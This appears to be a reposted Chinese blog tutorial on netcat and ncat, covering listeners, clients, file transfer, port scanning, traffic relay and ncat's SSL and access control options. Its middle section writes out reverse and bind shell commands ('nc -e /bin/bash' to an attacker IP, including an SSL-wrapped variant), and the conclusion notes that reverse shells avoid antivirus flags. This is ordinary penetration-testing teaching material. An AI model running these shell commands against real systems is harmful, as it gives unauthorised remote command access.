Netcat - 你需要知道的一切
yuyutoo 2025-01-20 17:49 2 浏览 0 评论
更多互联网精彩资讯、工作效率提升关注【飞鱼在浪屿】(日更新)
Netcat 是一种网络间连接和读写数据的工具,使用 TCP 或 UDP 协议。Netcat 被称为 TCP/IP/网络瑞士军刀。本文研究 netcat 的不同应用,以及如何在渗透测试、安全专家、系统管理员等的日常使用中发挥作用……
netcat 有多种版本,但大多数核心功能和命令行选项都非常相似。Netcat 最初是为 Unix 编写的,我们将看到的版本是基于 linux 的,此外你还可以找到 Windows版的 netcat。
Netcat Traditional
Netcat Traditional 是最初的版本。这不会预先安装,使用apt search netcat在ubuntu/debian 的机器上搜索,显示为netcat 或 netcat-traditional。
要安装它,您可以运行sudo apt install netcat-traditional或通过从源代码编译,可以从项目页面https://nc110.sourceforge.io/ 获取。
GNU版本
GNU Netcat 是对原始 netcat 的重写,具有新功能并完全符合 GNU 的可移植性。它似乎也不再维护,因为它的最新版本是 2004 年的 0.7.1。
Netcat OpenBSD
Netcat OpenBSD 版本是对原始 netcat 的重写,包括对 IPv6、代理和 unix 套接字的支持。除了这些增强功能之外。
这个版本是最常见的,默认安装在 ubuntu 发行版。
通过apt search netcat在 ubuntu 机器上运行,显示为 netcat-openbsd 包。
运行sudo apt install netcat-openbsd安装 netcat 后,它会符号链接到 nc 和 netcat。我们可以通过检查 nc 和 netcat 的 realpath 来看到这一点。
可以通过运行查看可用的命令行选项netcat -h。
ncat
Ncat 是对 nmap 项目 netcat 的重新实现。此版本功能更加丰富和改进。
安装 nmap,也会安装 ncat,这适用于 windows 和 linux。然后可以运行ncat -h以查看可用的命令行选项。
我们将关注 2 个最新的版本,netcat-openbsd和ncat,因为它们是最近维护和更新的。
服务器/客户端模式
服务器模式
在服务器模式下,使用 netcat 来侦听连接。这样做是在系统上打开一个端口(tcp 或 udp)。
默认情况下,netcat 侦听 tcp。以下命令将侦听端口 8080 上的所有接口。
nc -lvnp 8080
要指定要侦听的接口,例如 localhost,使用以下语法
nc -s 127.0.0.1 -lvnp 8080
// 也可以写成:
ncat -lvn 127.0.0.1 8080
监听 udp 的语法与 tcp 类似,加上-u 选项。
nc -l -u -v -n -p 8080
命令行选项可以组合在一起使用或分开使用。
客户端模式
在客户端模式下,可以使用 netcat 连接到系统上的开放端口。这用来手动检查服务或仅检查端口是否打开。
对于在端口 8080 上连接到 IP 127.0.0.1 时的 tcp 连接,语法如下。
nc -vn 127.0.0.1 8080
对于 udp 连接,添加 -u 选项。
nc -uvn 127.0.0.1 8080
反向Shell/绑定Shell
反向 shell 和绑定 shell 在渗透测试中非常流行,并且使用 netcat容易实现。
使用的命令仅适用于 ncat、netcat traditional和 gnu netcat。Netcat OpenBSD 没有这个特性,因为它认为这个功能是一个安全风险。
对于反向 shell,我们在服务器模式下使用 netcat 来侦听连接,然后从客户端提供 shell。这将允许服务器上的会话在收到 shell 后在客户端上运行命令。从渗透测试的角度来看,服务器是攻击者机器,客户端是受害者机器。
服务器(攻击者机器)
nc -lvnp 8080
客户端(受害者机器)
nc -e /bin/bash 192.168.125.10 8080
绑定贝壳
对于绑定 shell,服务器模式下的 netcat 侦听连接并将 shell 进程提供给任何连接的客户端。然后以客户端模式运行的 Netcat 可以连接到服务器并获得对服务器的 shell 访问并运行命令。从渗透测试的角度来看,服务器是受害者机器,客户端是攻击者机器。
服务器(受害者机器)
nc -e /bin/bash -lvnp 8080
客户端(攻击机)
nc 192.168.125.10 8080
文件传输
因为能够在原始连接写入数据,我们可以通过连接将文件从一个系统传输到另一个系统。
我们并不关心哪个是服务器,哪个是客户端,因为传输可以朝任一方向进行,但我们需要先运行监听器。
要通过端口 8080 将 server1 上的文件传输到 server2,可以按如下方式完成:
nc -lvnp 8080 < infile (server1)
nc 192.168.125.10 8080 > outfile (server2)
在相反的方向做同样的事情:
nc 192.168.125.20 8080 < infile (server1)
nc -lvnp 8080 > outfile (server2)
端口扫描
此功能未在 ncat 中实现,但在其他版本中可用。但有一个更好的工具,那就是 nmap。
如果系统有netcat-openbsd并且无法安装 nmap,那么如下运行nc做基本的端口扫描。
nc -nvv -w 1 -z 127.0.0.1 1-1000
要扫描目标上的 UDP 端口,使用以下语法。
nc -nvv -w 1 -z -u 127.0.0.1 1-1000
流量重定向
这仅适用于支持 -e 选项的版本。
以下面的场景为例,server1 不能直接连接到 server3,而只能通过 server2。
server1 <-------------> server2 <-------------> server3
要将流量从 server1 重定向到在端口 8080 上运行在 server3 (192.168.125.40) 上的 Web 应用程序,我们可以在 server2 上执行以下 ncat 命令。
nc -klvnp 8000 -e "/bin/nc 192.168.125.40 8080"
现在,通过访问 server2的端口8000来访问 server3 上的 Web 应用程序。
Ncat 附加功能
从这些功能可以看出安全风险,因为连接上没有加密,因为 netcat 将以最原始的形式写入连接,因此任何嗅探网络的人都可以在外壳和文件传输的情况下捕获未加密的所有流量。对于绑定 shell,没有身份验证,因此任何连接到绑定 shell 正在侦听的端口的人都可以在机器上运行命令。
ncat 时允许使用 ssl 以及访问控制。
加密外壳
添加--ssl到命令中
服务器
nc --ssl -lvnp 8080
客户端
nc --ssl -e /bin/bash 192.168.125.10 8080
访问控制
在服务器模式下使用 netcat 时,该--allow选项可以指定允许连接到端口的主机或网络范围,用于绑定 shell。同样,使用 –deny 拒绝来自特定主机或网络范围的访问。
nc --allow 127.0.0.1 -e /bin/bash -lvnp 8000
上面的命令将绑定 shell 设置为只接受来自本地主机的连接。
结论
Netcat 是用于网络相关活动的非常棒的工具,可以获得反向外壳并且不会被标记为病毒。
参考文献
https://en.wikipedia.org/wiki/Netcat
https://nmap.org/ncat/guide/index.html
http://netcat.sourceforge.net/
https://nc110.sourceforge.io/
https://eternallybored.org/misc/netcat/
相关推荐
- 建筑福利-pdf转dwg格式转换器,再也不用描图-极客青年
-
作为一名经常熬夜画图的建筑狗或者cad用户,你体验过pdf图纸描图到cad吗?前几天一个老同学找我,说他的毕业设计需要我帮忙,发给我一份pdf图纸文件,问我怎么把pdf图纸转换成dwg格式。机智的我灵...
- 想学 HTML,不知从何入手?看完这篇文章你就知道了
-
很多人都说HTML是一门很简单的语言,看看书,看看视频就能读懂。但是,如果你完全没有接触过,就想通过看一遍教程,背背标签,想要完全了解HTML,真的有点太天真了。HTML中文...
- 「前端」HTML之结构
-
今天继续为大家分享前端的知识,如果对前端比较感兴趣的小伙伴,可以关注我,我会更大家继续分享更多与前端相关的内容,当然如果内容中又不当的或者文字错误的,欢迎大家在评论区留言,我会及时修改纠正。1.初识H...
- 手把手教你使用Python网络爬虫下载一本小说(附源码)
-
大家好,我是Python进阶者。前言前几天【磐奚鸟】大佬在群里分享了一个抓取小说的代码,感觉还是蛮不错的,这里分享给大家学习。...
- 用于处理pdf文件格式的转换器
-
在上传过程中如果单个文件太大则容易中断,而且文件太大的话对与存储也有些弊端。那么我们应该想到将文件进行压缩(注意这里压缩指的是不改变文件格式的压缩,而不是用变成压缩文件。这里就将以下用专门的软件压缩P...
- 乐书:在线 Kindle 电子书制作和转换工具
-
之前Kindle伴侣曾推荐过可以在Windows和Mac系统平台上运行的kindle电子书制作软件Sigil(教程),用它可以制作出高质量的的ePub格式电子书,当然最后还需要通...
- 付费文档怎么下载?教你5种方法,任意下载全网资源
-
网上查资料的时候,经常遇到需要注册登录或者付费的才能复制或者是下载,遇到这种情况大多数人都会选择重新查。...
- 捡来的知识!3种方法随便复制网页内容,白嫖真香呀
-
网上的资源真的多,所以许多人常常会从网上找资料。我们看到感兴趣的内容,第一时间可能会想要收入囊中。比如说截个图啊,或者挑选有意思的句子复制粘贴,记录下来。可是,有些时候,却会遇到这样的情况:1、内容不...
- AI的使用,生成HTML网页。
-
利用deepseek,豆包,kimi以及通义千问,写入相同的需求。【写一个网页,实现抽奖功能,点击“开始”,按键显示“停止”,姓名开始显示在屏幕上,人员包括:“张三”,“里斯”,“Bool”,“流水废...
- pdf转换成jpg转换器 4.1 官方正式版
-
pdf转换成jpg工具软件简介pdf转换成jpg转换器是一款界面简洁,操作方便的pdf转换成jpg转换器。pdf转换成jpg转换器可以将PDF文档转换为JPG,BMP,GIF,PNG,TIF图片文件。...
- 办公必备的office转换成pdf转换器怎么用?
-
2016-02-2415:53:37南方报道网评论(我要点评)字体刚从校园走出社会,对于快节奏的办公环境,难免会觉得有些吃力。在起步阶段力求将手头上的事情按时完工不出错,但是渐渐的你会发现,别人只...
- 为什么PDF转Word大多要收费?
-
PDF转Word大多都要收费?并非主要是因为技术上的难度,而是基于多方面的商业和版权考虑的,下面给大家浅分析下原因:...
- 如何用python生成简单的html report报告
-
前提:用python写了一个简单的log分析,主要也就是查询一些key,value出来,后面也可以根据需求增加。查询出来后,为了好看,搞个html表格来显示。需要的组件:jinja2flask...
- 学用系列|如何搞定word批量替换修改和格式转换?这里一站搞定
-
想必不少朋友都会碰到批量修改word文档内容、压缩文档图片、文件格式转换等重复性文档处理工作的需要,今天胖胖老师就推荐给大家一个免费工具XCLWinKits,一站搞定你所有的需要。什么是XCLWinK...
- 这款PDF文档转换神器,能帮你解决PDF使用中的许多难点
-
不管是平时的学习还是工作,相信许多朋友都经常接触PDF文件。可以说,PDF文件在我们的日常办公学习过程中的重要性和Word文档一样重要。在之前的更新中,小编介绍了几款非常不错的PDF文档格式转换软件,...
你 发表评论:
欢迎- 一周热门
-
-
前端面试:iframe 的优缺点? iframe有那些缺点
-
带斜线的表头制作好了,如何填充内容?这几种方法你更喜欢哪个?
-
漫学笔记之PHP.ini常用的配置信息
-
其实模版网站在开发工作中很重要,推荐几个参考站给大家
-
推荐7个模板代码和其他游戏源码下载的网址
-
[干货] JAVA - JVM - 2 内存两分 [干货]+java+-+jvm+-+2+内存两分吗
-
正在学习使用python搭建自动化测试框架?这个系统包你可能会用到
-
织梦(Dedecms)建站教程 织梦建站详细步骤
-
【开源分享】2024PHP在线客服系统源码(搭建教程+终身使用)
-
2024PHP在线客服系统源码+完全开源 带详细搭建教程
-
- 最近发表
- 标签列表
-
- mybatis plus (70)
- scheduledtask (71)
- css滚动条 (60)
- java学生成绩管理系统 (59)
- 结构体数组 (69)
- databasemetadata (64)
- javastatic (68)
- jsp实用教程 (53)
- fontawesome (57)
- widget开发 (57)
- vb net教程 (62)
- hibernate 教程 (63)
- case语句 (57)
- svn连接 (74)
- directoryindex (69)
- session timeout (58)
- textbox换行 (67)
- extension_dir (64)
- linearlayout (58)
- vba高级教程 (75)
- iframe用法 (58)
- sqlparameter (59)
- trim函数 (59)
- flex布局 (63)
- contextloaderlistener (56)